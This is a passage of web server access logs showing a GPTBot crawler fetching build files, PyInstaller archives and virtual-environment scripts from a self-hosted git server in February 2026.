192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:15:51:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2349] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:15:51:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 295] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:15:51:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13497] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build" +[17/Feb/2026:15:51:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13494] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build" +[17/Feb/2026:15:51:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13708] [Gzip 6.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:15:51:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/EXE-00.toc" [Client 74.7.227.38] [Length 154941] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/EXE-00.toc" +[17/Feb/2026:15:51:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" [Client 74.7.227.38] [Length 44071] [Gzip 15.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:15:51:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/EXE-00.toc" [Client 74.7.227.38] [Length 70840] [Gzip 17.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:15:51:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13495] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build" +[17/Feb/2026:15:51:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 15179] [Gzip 6.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:15:51:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" [Client 74.7.227.38] [Length 10883] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:15:51:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PKG-00.toc" [Client 74.7.227.38] [Length 69317] [Gzip 17.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:15:51:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 16419] [Gzip 5.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build" +[17/Feb/2026:15:51:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:15:51:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9950] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:15:51:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:15:51:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13711] [Gzip 6.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:15:51:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" [Client 74.7.227.38] [Length 58144] [Gzip 28.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" +[17/Feb/2026:15:52:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/EXE-00.toc" [Client 74.7.227.38] [Length 98899] [Gzip 28.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/EXE-00.toc" +[17/Feb/2026:15:52:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/EXE-00.toc" [Client 74.7.227.38] [Length 9891] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/EXE-00.toc" +[17/Feb/2026:15:52:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" [Client 74.7.227.38] [Length 9894] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" +[17/Feb/2026:15:52:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" [Client 74.7.227.38] [Length 9895] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" +[17/Feb/2026:15:52:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PKG-00.toc" [Client 74.7.227.38] [Length 9923] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PKG-00.toc" +[17/Feb/2026:15:52:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PKG-00.toc" [Client 74.7.227.38] [Length 97752] [Gzip 28.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PKG-00.toc" +[17/Feb/2026:15:52:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/build.ninja" +[17/Feb/2026:15:52:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" [Client 74.7.227.38] [Length 14238076] [Gzip 11.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" +[17/Feb/2026:15:52:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/EXE-00.toc" [Client 74.7.227.38] [Length 154941] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/EXE-00.toc" +[17/Feb/2026:15:52:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2349] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:15:52:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13708] [Gzip 6.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:15:52:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2349] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:15:52:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PKG-00.toc" [Client 74.7.227.38] [Length 153194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PKG-00.toc" +[17/Feb/2026:15:52:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" [Client 74.7.227.38] [Length 92594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" +[17/Feb/2026:15:52:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 17752] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/build.ninja" +[17/Feb/2026:15:52:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2349] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:15:52:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" [Client 74.7.227.38] [Length 4617598] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" +[17/Feb/2026:15:52:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11623] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp" +[17/Feb/2026:15:52:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 17080] [Gzip 11.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/build.ninja" +[17/Feb/2026:15:52:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 11067] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build" +[17/Feb/2026:15:52:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 16417] [Gzip 5.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build" +[17/Feb/2026:15:52:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 11053] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build" +[17/Feb/2026:15:52:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:15:52:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 9919] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:15:52:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 9950] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:15:52:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 9906] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:15:52:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14884] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Services.tsx" +[17/Feb/2026:15:52:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10867] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom4.png" +[17/Feb/2026:15:52:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:15:52:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11046] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:15:52:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 10207] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:15:52:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr 